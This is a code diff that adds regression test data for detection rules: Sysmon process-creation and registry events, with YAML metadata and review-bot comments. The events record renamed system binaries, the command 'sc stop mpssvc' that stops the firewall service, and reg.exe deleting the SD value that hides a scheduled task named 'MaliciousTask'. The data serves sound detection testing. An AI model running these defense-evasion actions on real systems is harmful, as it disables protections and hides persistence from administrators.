"5AB40FD1-8D74-68F7-E44B-100000000000", + "LogonId": "0x104be4", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "MD5=BA3DDE938146C1C1A19D6762E0BF5311,SHA256=61891E70C5629397DD107066F520D1663C5136AB4366E0CB015EC1D047DFFC61,IMPHASH=EB3973026D64331DD575543A07621F9D", + "ParentProcessGuid": "5AB40FD1-3E0C-68F9-1731-000000003B02", + "ParentProcessId": 8252, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", + "ParentUser": "AR-WIN-1\\Administrator" + } + } +} 
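Review bot: nothing in the patch consumes this JSON; the test metadata in the sibling info.yml points only at the `.evtx`, so the two representations can drift silently after a future re-capture. Either document the `.json` as a human-readable rendering generated from the EVTX in CI, or have the regression runner check that the EVTX yields exactly the record shown here (`EventRecordID` 256810, `OriginalFileName` `wscript.exe`, `Image` ending in `renamed-wscript.exe`).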
diff --git a/regression_data/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant/info.yml b/regression_data/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant/info.yml new file mode 100644 index 000000000..c0be2dd95 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant/info.yml @@ -0,0 +1,13 @@ +id: 8fc87eda-5a7b-4080-93c6-5bf6145330c8 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 0ba1da6d-b6ce-4366-828c-18826c9de23e + title: Potential Defense Evasion Via Rename Of Highly Relevant Binaries +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant/0ba1da6d-b6ce-4366-828c-18826c9de23e.evtx 
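Review bot: `description: N/A` leaves the sample undocumented; state what the EVTX holds (a single Sysmon EventID 1 for `wscript.exe` renamed to `renamed-wscript.exe`, spawned by `cmd.exe`, per the companion JSON) so that `match_count: 1` can be verified without opening the binary file. The suite also carries only a Positive Detection Test; a second sample in which the `Image` basename equals `OriginalFileName` with `match_count: 0` would catch later selection changes that over-match.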
diff --git a/regression_data/windows/process_creation/proc_creation_win_renamed_curl/7530cd3d-7671-43e3-b209-976966f6ea48.evtx b/regression_data/windows/process_creation/proc_creation_win_renamed_curl/7530cd3d-7671-43e3-b209-976966f6ea48.evtx new file mode 100644 index 0000000000000000000000000000000000000000..1cbd0fd5ec892ab92d9d24bf1ff8fcd12e061d40 GIT binary patch literal 69632
diff --git a/regression_data/windows/process_creation/proc_creation_win_renamed_curl/7530cd3d-7671-43e3-b209-976966f6ea48.json b/regression_data/windows/process_creation/proc_creation_win_renamed_curl/7530cd3d-7671-43e3-b209-976966f6ea48.json new file mode 100644 index 000000000..965a92298 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_renamed_curl/7530cd3d-7671-43e3-b209-976966f6ea48.json
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-22T20:30:29.328671Z" + } + }, + "EventRecordID": 256840, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3168, + "ThreadID": 4580 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-1", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-22 20:30:29.319", + "ProcessGuid": "5AB40FD1-3EE5-68F9-3A31-000000003B02", + "ProcessId": 480, + "Image": "C:\\Users\\Administrator\\Downloads\\testdata\\renamed-curl.exe", + "FileVersion": "8.13.0", + "Description": "The curl executable", + "Product": "The curl executable", + "Company": "curl, https://curl.se/", + "OriginalFileName": "curl.exe", + "CommandLine": "renamed-curl.exe", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\testdata\\", + "User": "AR-WIN-1\\Administrator", + "LogonGuid": "5AB40FD1-8D74-68F7-E44B-100000000000", + "LogonId": "0x104be4", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "MD5=90939B67542D77A32042B7C1945623B1,SHA256=3345339164CF384EFF527B6C3160FEA8D849A4231EC6CA80513E3A739E505168,IMPHASH=6C25E5A258C8C037CD5FBE44B10E696F", + "ParentProcessGuid": "5AB40FD1-3E0C-68F9-1731-000000003B02", + "ParentProcessId": 8252, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", + "ParentUser": "AR-WIN-1\\Administrator" + } + } +} 
diff --git a/regression_data/windows/process_creation/proc_creation_win_renamed_curl/info.yml b/regression_data/windows/process_creation/proc_creation_win_renamed_curl/info.yml new file mode 100644 index 000000000..3c18db285 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_renamed_curl/info.yml @@ -0,0 +1,13 @@ +id: a8016fa4-d7e0-40de-85b0-ae04f270eec5 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 7530cd3d-7671-43e3-b209-976966f6ea48 + title: Renamed CURL.EXE Execution +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_renamed_curl/7530cd3d-7671-43e3-b209-976966f6ea48.evtx 
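Review bot: `title: Renamed CURL.EXE Execution` under `rule_metadata` duplicates a value owned by the rule file and will go stale the moment the rule is retitled, while `id: 7530cd3d-7671-43e3-b209-976966f6ea48` is the stable key. Either have the CI script resolve the title from the rule by id and fail on mismatch, or drop `title` from `rule_metadata` and keep only the id.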
diff --git a/regression_data/windows/process_creation/proc_creation_win_renamed_ftp/277a4393-446c-449a-b0ed-7fdc7795244c.evtx b/regression_data/windows/process_creation/proc_creation_win_renamed_ftp/277a4393-446c-449a-b0ed-7fdc7795244c.evtx new file mode 100644 index 0000000000000000000000000000000000000000..d133234a88b750991f81e5c8c032dfe231ffabe5 GIT binary patch literal 69632
diff --git a/regression_data/windows/process_creation/proc_creation_win_renamed_ftp/277a4393-446c-449a-b0ed-7fdc7795244c.json b/regression_data/windows/process_creation/proc_creation_win_renamed_ftp/277a4393-446c-449a-b0ed-7fdc7795244c.json new file mode 100644 index 000000000..0b1521ea0 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_renamed_ftp/277a4393-446c-449a-b0ed-7fdc7795244c.json 
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-22T20:25:23.218638Z" + } + }, + "EventRecordID": 256757, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3168, + "ThreadID": 4580 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-1", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-22 20:25:23.215", + "ProcessGuid": "5AB40FD1-3DB3-68F9-0A31-000000003B02", + "ProcessId": 5312, + "Image": "C:\\Users\\Administrator\\Downloads\\testdata\\renamed-ftp.exe", + "FileVersion": "10.0.20348.3451 (WinBuild.160101.0800)", + "Description": "File Transfer Program", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "ftp.exe", + "CommandLine": "renamed-ftp.exe", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\testdata\\", + "User": "AR-WIN-1\\Administrator", + "LogonGuid": "5AB40FD1-8D74-68F7-E44B-100000000000", + "LogonId": "0x104be4", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "MD5=02EF5C4F3C041DE47811498C331B6F46,SHA256=B551CF05B43639364EFC71995E19DB620F5EFCE311110D0CF932354C3FE6ED7A,IMPHASH=7B22256667E90FDEA4DBB956FD02584C", + "ParentProcessGuid": "5AB40FD1-8DEB-68F7-7E01-000000003B02", + "ParentProcessId": 476, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", + "ParentUser": "AR-WIN-1\\Administrator" + } + } +} 
diff --git a/regression_data/windows/process_creation/proc_creation_win_renamed_ftp/info.yml b/regression_data/windows/process_creation/proc_creation_win_renamed_ftp/info.yml new file mode 100644 index 000000000..dc986bbfb --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_renamed_ftp/info.yml @@ -0,0 +1,13 @@ +id: 280664b2-b588-40f6-8b65-280523049740 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 277a4393-446c-449a-b0ed-7fdc7795244c + title: Renamed FTP.EXE Execution +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_renamed_ftp/277a4393-446c-449a-b0ed-7fdc7795244c.evtx 
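Review bot: `match_count: 1` against a one-event EVTX only proves the rule still fires; it cannot distinguish a correct `OriginalFileName: ftp.exe` match from a selection that has become broad enough to match any `ftp.exe` execution. Add a negative sample (the unrenamed binary, `Image` basename `ftp.exe`) under `regression_tests_info` with `match_count: 0`, and replace `description: N/A` with a sentence naming the captured event so the expected count is reviewable.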
diff --git a/regression_data/windows/process_creation/proc_creation_win_renamed_msdt/bd1c6866-65fc-44b2-be51-5588fcff82b9.evtx b/regression_data/windows/process_creation/proc_creation_win_renamed_msdt/bd1c6866-65fc-44b2-be51-5588fcff82b9.evtx new file mode 100644 index 0000000000000000000000000000000000000000..aff2198c86c78f6fd540e3dde8d7c306636c45cf GIT binary patch literal 69632
diff --git a/regression_data/windows/process_creation/proc_creation_win_renamed_msdt/bd1c6866-65fc-44b2-be51-5588fcff82b9.json b/regression_data/windows/process_creation/proc_creation_win_renamed_msdt/bd1c6866-65fc-44b2-be51-5588fcff82b9.json new file mode 100644 index 000000000..9ae6747df --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_renamed_msdt/bd1c6866-65fc-44b2-be51-5588fcff82b9.json
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-22T20:32:00.478719Z" + } + }, + "EventRecordID": 256855, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3168, + "ThreadID": 4580 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-1", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-22 20:32:00.468", + "ProcessGuid": "5AB40FD1-3F40-68F9-4431-000000003B02", + "ProcessId": 2808, + "Image": "C:\\Users\\Administrator\\Downloads\\testdata\\renamed-msdt.exe", + "FileVersion": "10.0.20348.2849 (WinBuild.160101.0800)", + "Description": "Diagnostics Troubleshooting Wizard", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "msdt.exe", + "CommandLine": "renamed-msdt.exe", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\testdata\\", + "User": "AR-WIN-1\\Administrator", + "LogonGuid": "5AB40FD1-8D74-68F7-E44B-100000000000", + "LogonId": "0x104be4", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "MD5=7C70F1DDC865BCFF963AD1CCFAA5E145,SHA256=377DD147174704790E2E981893E49FB72CE18133CF7E9E2EAA794ADF2F80D2DA,IMPHASH=9F0D1C67FCB6D4D5059556FF5E9A642B", + "ParentProcessGuid": "5AB40FD1-3E0C-68F9-1731-000000003B02", + "ParentProcessId": 8252, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", + "ParentUser": "AR-WIN-1\\Administrator" + } + } +} 
diff --git a/regression_data/windows/process_creation/proc_creation_win_renamed_msdt/info.yml b/regression_data/windows/process_creation/proc_creation_win_renamed_msdt/info.yml new file mode 100644 index 000000000..39305505b --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_renamed_msdt/info.yml @@ -0,0 +1,13 @@ +id: 0e26deb8-bbad-45fb-bb52-b5a2204ba626 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: bd1c6866-65fc-44b2-be51-5588fcff82b9 + title: Renamed Msdt.EXE Execution +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_renamed_msdt/bd1c6866-65fc-44b2-be51-5588fcff82b9.evtx 
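Review bot: `date: 2025-10-24` does not match the capture time of the event in the companion JSON (`UtcTime` 2025-10-22 20:32:00), so the meaning of `date` is ambiguous: creation date of the test-data entry or capture date of the telemetry. Document which one it is in the schema the CI script validates against, since the same two-day gap appears in every info.yml in this patch.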
diff --git a/regression_data/windows/process_creation/proc_creation_win_sc_stop_service/81bcb81b-5b1f-474b-b373-52c871aaa7b1.evtx b/regression_data/windows/process_creation/proc_creation_win_sc_stop_service/81bcb81b-5b1f-474b-b373-52c871aaa7b1.evtx new file mode 100644 index 0000000000000000000000000000000000000000..b1c5e625a991122c5c1621b48aa0c5868502326c GIT binary patch literal 69632
diff --git a/regression_data/windows/process_creation/proc_creation_win_sc_stop_service/81bcb81b-5b1f-474b-b373-52c871aaa7b1.json b/regression_data/windows/process_creation/proc_creation_win_sc_stop_service/81bcb81b-5b1f-474b-b373-52c871aaa7b1.json new file mode 100644 index 000000000..c1b8abd09 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_sc_stop_service/81bcb81b-5b1f-474b-b373-52c871aaa7b1.json
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-22T20:33:27.276702Z" + } + }, + "EventRecordID": 256875, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3168, + "ThreadID": 4580 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-1", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-22 20:33:27.274", + "ProcessGuid": "5AB40FD1-3F97-68F9-5631-000000003B02", + "ProcessId": 3424, + "Image": "C:\\Windows\\System32\\sc.exe", + "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", + "Description": "Service Control Manager Configuration Tool", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "sc.exe", + "CommandLine": "sc stop mpssvc", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\testdata\\", + "User": "AR-WIN-1\\Administrator", + "LogonGuid": "5AB40FD1-8D74-68F7-E44B-100000000000", + "LogonId": "0x104be4", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "MD5=6FB10CD439B40D92935F8F6A0C99670A,SHA256=2BF663EA493CDC21AD33AEBD8DA40CC5D2AFA55E24F9E1BBF3D73E99DCADF693,IMPHASH=803254E010814E69947095A2725B2AFD", + "ParentProcessGuid": "5AB40FD1-3E0C-68F9-1731-000000003B02", + "ParentProcessId": 8252, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", + "ParentUser": "AR-WIN-1\\Administrator" + } + } +} 
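Review bot: this JSON export is not referenced anywhere in the test metadata (the matching info.yml lists only the `.evtx` path), so it exists purely as a human-readable companion to the binary sample; a sentence in info.yml's `description` saying so, and that the two files must be regenerated together, would stop them drifting apart. The event itself is fine as a positive case: `"CommandLine": "sc stop mpssvc"` spawned from `cmd.exe` with `"IntegrityLevel": "High"`.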
diff --git a/regression_data/windows/process_creation/proc_creation_win_sc_stop_service/81bcb81b-5b1f-474b-b373-52c871aaa7b1.jsoncls b/regression_data/windows/process_creation/proc_creation_win_sc_stop_service/81bcb81b-5b1f-474b-b373-52c871aaa7b1.jsoncls new file mode 100644 index 000000000..c1b8abd09 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_sc_stop_service/81bcb81b-5b1f-474b-b373-52c871aaa7b1.jsoncls 
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-22T20:33:27.276702Z" + } + }, + "EventRecordID": 256875, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3168, + "ThreadID": 4580 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-1", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-22 20:33:27.274", + "ProcessGuid": "5AB40FD1-3F97-68F9-5631-000000003B02", + "ProcessId": 3424, + "Image": "C:\\Windows\\System32\\sc.exe", + "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", + "Description": "Service Control Manager Configuration Tool", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "sc.exe", + "CommandLine": "sc stop mpssvc", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\testdata\\", + "User": "AR-WIN-1\\Administrator", + "LogonGuid": "5AB40FD1-8D74-68F7-E44B-100000000000", + "LogonId": "0x104be4", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "MD5=6FB10CD439B40D92935F8F6A0C99670A,SHA256=2BF663EA493CDC21AD33AEBD8DA40CC5D2AFA55E24F9E1BBF3D73E99DCADF693,IMPHASH=803254E010814E69947095A2725B2AFD", + "ParentProcessGuid": "5AB40FD1-3E0C-68F9-1731-000000003B02", + "ParentProcessId": 8252, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", + "ParentUser": "AR-WIN-1\\Administrator" + } + } +} 
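Review bot: the `.jsoncls` file is byte-identical to the `.json` added just above (both diff headers show the same blob id, `000000000..c1b8abd09`) and nothing in info.yml references a `.jsoncls` file; this looks like an accidental copy and should be dropped from the PR rather than committed.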
diff --git a/regression_data/windows/process_creation/proc_creation_win_sc_stop_service/info.yml b/regression_data/windows/process_creation/proc_creation_win_sc_stop_service/info.yml new file mode 100644 index 000000000..fafc9e989 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_sc_stop_service/info.yml @@ -0,0 +1,13 @@ +id: 81ea361b-6e7b-417c-8f70-abd288b10c35 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 81bcb81b-5b1f-474b-b373-52c871aaa7b1 + title: Stop Windows Service Via Sc.EXE +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_sc_stop_service/81bcb81b-5b1f-474b-b373-52c871aaa7b1.evtx 
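Review bot: `description: N/A` should state what the sample exercises (an `sc stop mpssvc` invocation from `cmd.exe`, per the companion JSON, which rule `81bcb81b-5b1f-474b-b373-52c871aaa7b1` must match once). As with the other new info.yml files, only a `Positive Detection Test` is listed; a negative sample (for example an `sc` invocation that does not stop a service, expected `match_count: 0`) would guard against the rule being loosened in a later edit.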
diff --git a/regression_data/windows/registry/registry_delete/registry_delete_removal_amsi_registry_key/41d1058a-aea7-4952-9293-29eaaf516465.evtx b/regression_data/windows/registry/registry_delete/registry_delete_removal_amsi_registry_key/41d1058a-aea7-4952-9293-29eaaf516465.evtx new file mode 100644 index 0000000000000000000000000000000000000000..cca37ccdfff7d21952e438ef3a44110fb71b6382 GIT binary patch literal 69632
diff --git a/regression_data/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal/acd74772-5f88-45c7-956b-6a7b36c294d2.json b/regression_data/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal/acd74772-5f88-45c7-956b-6a7b36c294d2.json new file mode 100644 index 000000000..e0ee86d51 --- /dev/null +++ b/regression_data/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal/acd74772-5f88-45c7-956b-6a7b36c294d2.json @@ -0,0 +1,51 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 12, + "Version": 2, + "Level": 4, + "Task": 12, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T00:01:54.872810Z" + } + }, + "EventRecordID": 155709, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "EventType": "DeleteValue", + "UtcTime": "2025-10-25 00:01:54.861", + "ProcessGuid": "5AA13A44-1372-68FC-A51E-000000004002", + "ProcessId": 7008, + "Image": "C:\\Windows\\system32\\reg.exe", + "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\MaliciousTask\\SD", + "User": "NT AUTHORITY\\SYSTEM" + } + } +} diff --git a/regression_data/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal/info.yml b/regression_data/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal/info.yml new file mode 100644 index 000000000..797434d31 
--- /dev/null +++ b/regression_data/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal/info.yml @@ -0,0 +1,13 @@ +id: b796fd1e-a03a-4db8-a072-c597b6e0da1b +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: acd74772-5f88-45c7-956b-6a7b36c294d2 + title: Removal Of SD Value to Hide Schedule Task - Registry +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal/acd74772-5f88-45c7-956b-6a7b36c294d2.evtx 
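Review bot: the JSON fixture for acd74772-5f88-45c7-956b-6a7b36c294d2 only covers the happy path, while the commit message says it was the EventType condition that broke this rule; a single positive event cannot show that the fix is scoped correctly. The event is Sysmon EventID 12 with EventType "DeleteValue", Image C:\Windows\system32\reg.exe and TargetObject HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\MaliciousTask\SD, which is exactly the case the rule must match. Consider adding a second event on the same TargetObject with a different EventType and listing it in info.yml with match_count: 0, so a later change that reintroduces an over-broad or over-narrow EventType filter is caught by the regression run rather than by a user.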
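Review bot: `description: N/A` in info.yml leaves empty the one field a maintainer will read to learn what this fixture exercises; replace it with a sentence naming the simulated action (reg.exe, running as NT AUTHORITY\SYSTEM, deleting the SD value under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\MaliciousTask) and, since the PR title mentions simulation links, the source of the simulation. Separately, `date: 2025-10-24` predates the SystemTime 2025-10-25T00:01:54.872810Z recorded in the matching JSON; if `date` is meant to be the capture date, align it with the event, otherwise state what it represents so the two timestamps do not look inconsistent.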
diff --git a/regression_data/windows/registry/registry_event/registry_event_add_local_hidden_user/460479f3-80b7-42da-9c43-2cc1d54dbccd.evtx b/regression_data/windows/registry/registry_event/registry_event_add_local_hidden_user/460479f3-80b7-42da-9c43-2cc1d54dbccd.evtx new file mode 100644 index 0000000000000000000000000000000000000000..d2da07e5eab71f1f47985e1159eb772522c5f535 GIT binary patch literal 69632